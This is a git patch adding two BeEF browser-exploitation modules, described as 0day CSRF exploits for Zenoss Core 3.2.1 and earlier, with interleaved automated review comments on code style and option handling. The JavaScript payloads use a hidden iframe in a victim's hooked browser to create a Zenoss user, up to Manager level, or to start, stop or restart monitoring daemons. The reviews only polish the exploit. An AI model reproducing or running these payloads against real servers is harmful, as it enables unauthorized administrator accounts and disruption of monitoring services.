From c1975691f438c46ee5183cb4205b68f811873a11 Mon Sep 17 00:00:00 2001
From: bcoles
Date: Wed, 7 Mar 2012 15:02:12 +1030
Subject: [PATCH] Added a couple of 0day CSRF exploits for Zenoss Core <= 3.2.1
---
.../exploits/zenoss_add_user_csrf/command.js | 33 +++++++++
.../exploits/zenoss_add_user_csrf/config.yaml | 25 +++++++
.../exploits/zenoss_add_user_csrf/module.rb | 46 ++++++++++++
.../exploits/zenoss_daemon_csrf/command.js | 32 +++++++++
.../exploits/zenoss_daemon_csrf/config.yaml | 25 +++++++
modules/exploits/zenoss_daemon_csrf/module.rb | 70 +++++++++++++++++++
6 files changed, 231 insertions(+)
create mode 100644 modules/exploits/zenoss_add_user_csrf/command.js
create mode 100644 modules/exploits/zenoss_add_user_csrf/config.yaml
create mode 100644 modules/exploits/zenoss_add_user_csrf/module.rb
create mode 100644 modules/exploits/zenoss_daemon_csrf/command.js
create mode 100644 modules/exploits/zenoss_daemon_csrf/config.yaml
create mode 100644 modules/exploits/zenoss_daemon_csrf/module.rb
diff --git a/modules/exploits/zenoss_add_user_csrf/command.js b/modules/exploits/zenoss_add_user_csrf/command.js
new file mode 100644
index 000000000..9650a2684
--- /dev/null
+++ b/modules/exploits/zenoss_add_user_csrf/command.js
@@ -0,0 +1,33 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+ var base = '<%= @base %>';
+ var user_level = '<%= @user_level %>';
+ var username = '<%= @username %>';
+ var password = '<%= @password %>';
+
+ var zenoss_add_user_iframe = beef.dom.createInvisibleIframe();
+ zenoss_add_user_iframe.setAttribute('src', base+'/zport/dmd/ZenUsers?tableName=userlist&zenScreenName=manageUserFolder.pt&manage_addUser%3Amethod=OK&defaultAdminRole='+user_level+'&roles%3Alist='+user_level+'&userid='+username+'&password='+password);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(zenoss_add_user_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/zenoss_add_user_csrf/config.yaml b/modules/exploits/zenoss_add_user_csrf/config.yaml
new file mode 100644
index 000000000..3ae083e7a
--- /dev/null
+++ b/modules/exploits/zenoss_add_user_csrf/config.yaml
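Review bot: `cleanup` is assigned without `var` on the `cleanup = function() {` line, so it becomes an implicit global on the hooked page, and the string form `setTimeout("cleanup()", 15000);` then resolves it by name through eval-style evaluation; a local function reference, `var cleanup = function() { ... };` followed by `setTimeout(cleanup, 15000);`, avoids both. The option values are also rendered straight into single-quoted JS literals (`var base = '<%= @base %>';` and the three lines after it), so an operator value containing a quote or a backslash yields a syntax error in the generated script instead of a request; values should be escaped for JS-string context when the template is rendered. The same two issues appear in modules/exploits/zenoss_daemon_csrf/command.js.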
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ zenoss_add_user_csrf:
+ enable: true
+ category: "Exploits"
+ name: "Zenoss Add User CSRF"
+ description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server."
+ authors: ["bcoles"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/zenoss_add_user_csrf/module.rb b/modules/exploits/zenoss_add_user_csrf/module.rb
new file mode 100644
index 000000000..28fac6d60
--- /dev/null
+++ b/modules/exploits/zenoss_add_user_csrf/module.rb
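Review bot: The `description:` line states the effect but not the precondition: this is a CSRF module, so the request is presumably only honoured when the hooked browser already holds an authenticated Zenoss session with the rights the target form requires, and the `<= 3.2.1` bound is given without any advisory or reference. A reader choosing modules from the UI cannot judge applicability from `"Attempts to add a user to a Zenoss Core <= 3.2.1 server."` alone; suggest `description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server via CSRF. Requires the hooked browser to hold an authenticated Zenoss session."` and a reference to the source of the version claim, if the module config schema has a field for one. The same applies to modules/exploits/zenoss_daemon_csrf/config.yaml.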
@@ -0,0 +1,46 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Zenoss_add_user_csrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ { 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'},
+ { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
+ { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
+ { 'name' => 'user_level',
+ 'type' => 'combobox',
+ 'ui_label' => 'User Level',
+ 'store_type' => 'arraystore',
+ 'store_fields' => ['user_level'],
+ 'store_data' => [
+ ['Manager'],
+ ['ZenManager'],
+ ['ZenUser']
+ ],
+ 'emptyText' => 'Select a user level ("Manager" is highest)',
+ 'valueField' => 'user_level',
+ 'displayField' => 'user_level',
+ 'mode' => 'local',
+ 'autoWidth' => true
+ },
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/zenoss_daemon_csrf/command.js b/modules/exploits/zenoss_daemon_csrf/command.js
new file mode 100644
index 000000000..4b753f8ea
--- /dev/null
+++ b/modules/exploits/zenoss_daemon_csrf/command.js
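Review bot: The `user_level` combobox carries no `'value'` default, unlike the `base`, `username` and `password` entries above it, so if the operator leaves it unselected `@user_level` is presumably empty or nil when command.js is rendered and the generated request silently carries no role; either add a default the way the other three options do, or note in the option that the field is required and have the module refuse to run without it. `def self.options` uses an explicit `return [` for the method's only expression; the implicit return (`[` … `]` alone) is the idiomatic form, and the same applies to `Zenoss_daemon_csrf.options` in modules/exploits/zenoss_daemon_csrf/module.rb. The `save({'result' => @datastore['result']})` call can drop the braces: `save('result' => @datastore['result'])`.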
@@ -0,0 +1,32 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+ var base = '<%= @base %>';
+ var service = '<%= @service %>';
+ var action = '<%= @action %>';
+
+ var zenoss_daemon_iframe = beef.dom.createInvisibleIframe();
+ zenoss_daemon_iframe.setAttribute('src', base+'/zport/About?action='+action+'&daemon='+service+'&manage_daemonAction%3Amethod='+action);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(zenoss_daemon_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/zenoss_daemon_csrf/config.yaml b/modules/exploits/zenoss_daemon_csrf/config.yaml
new file mode 100644
index 000000000..9249f7d99
--- /dev/null
+++ b/modules/exploits/zenoss_daemon_csrf/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ zenoss_daemon_csrf:
+ enable: true
+ category: "Exploits"
+ name: "Zenoss Daemon CSRF"
+ description: "Attempts to start/stop/restart daemons on a Zenoss Core <= 3.2.1 server."
+ authors: ["bcoles"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/zenoss_daemon_csrf/module.rb b/modules/exploits/zenoss_daemon_csrf/module.rb
new file mode 100644
index 000000000..148f0c6bf
--- /dev/null
+++ b/modules/exploits/zenoss_daemon_csrf/module.rb
@@ -0,0 +1,70 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Zenoss_daemon_csrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ { 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'},
+ { 'name' => 'service',
+ 'type' => 'combobox',
+ 'ui_label' => 'Daemon',
+ 'store_type' => 'arraystore',
+ 'store_fields' => ['service', 'description'],
+ 'store_data' => [
+ ['zeoctl', 'zeoctl (Zope Enterprise Objects server - shares database between Zope instances)'],
+ ['zopectl', 'zopectl (The Zope open source web application server)'],
+ ['zenhub', 'zenhub (Broker between the data layer and the collection daemons)'],
+ ['zenjobs', 'zenjobs (Zenjobs)'],
+ ['zenping', 'zenping (ICMP ping status monitoring)'],
+ ['zensyslog', 'zensyslog (Collection of and classification of syslog events)'],
+ ['zenstatus', 'zenstatus (Active TCP connection testing of remote daemons)'],
+ ['zenactions', 'zenactions (Alerts - SMTP, SNPP and Maintenance Windows)'],
+ ['zentrap', 'zentrap (Receives SNMP traps and turns them into events)'],
+ ['zenmodeler', 'zenmodeler (Configuration collection and configuration)'],
+ ['zenperfsnmp', 'zenperfsnmp (High performance asynchronous SNMP performance collection)'],
+ ['zencommand', 'zencommand (Runs plug-ins on the local box or on remote boxes through SSH)'],
+ ['zenprocess', 'zenprocess (Process monitoring using SNMP host resources MIB)'],
+ ['zenwin', 
'zenwin (Windows Service Monitoring (WMI))'],
+ ['zeneventlog', 'zeneventlog (Collect (WMI) event log events (aka NT Eventlog))'],
+ ['zenjmx', 'zenjmx (ZenJMX)']
+ ],
+ 'emptyText' => 'Select a daemon',
+ 'valueField' => 'service',
+ 'displayField' => 'service', #'description',
+ 'mode' => 'local',
+ 'autoWidth' => true
+ },
+ { 'name' => 'action',
+ 'type' => 'combobox',
+ 'ui_label' => 'Action',
+ 'store_type' => 'arraystore',
+ 'store_fields' => ['action'],
+ 'store_data' => [
+ ['Start'],['Stop'],['Restart']
+ ],
+ 'valueField' => 'action',
+ 'displayField' => 'action',
+ 'mode' => 'local',
+ 'autoWidth' => true
+ }
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
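Review bot: `'displayField' => 'service', #'description',` leaves a commented-out alternative with no explanation, and the `description` column declared in `'store_fields' => ['service', 'description']` is then never shown, so the fifteen descriptive strings in `store_data` are dead data. Either set `'displayField' => 'description',` (keeping `'valueField' => 'service'`, which presumably makes the combobox show the description while submitting the daemon name) or drop the column and the stray comment. If the descriptions are kept, several are uninformative and should be reworded or removed: `'zenjobs (Zenjobs)'`, `'zenjmx (ZenJMX)'` and `'zenmodeler (Configuration collection and configuration)'`. Neither `service` nor `action` has a `'value'` default, so the behaviour of command.js when either is left unselected should be confirmed and documented on the option.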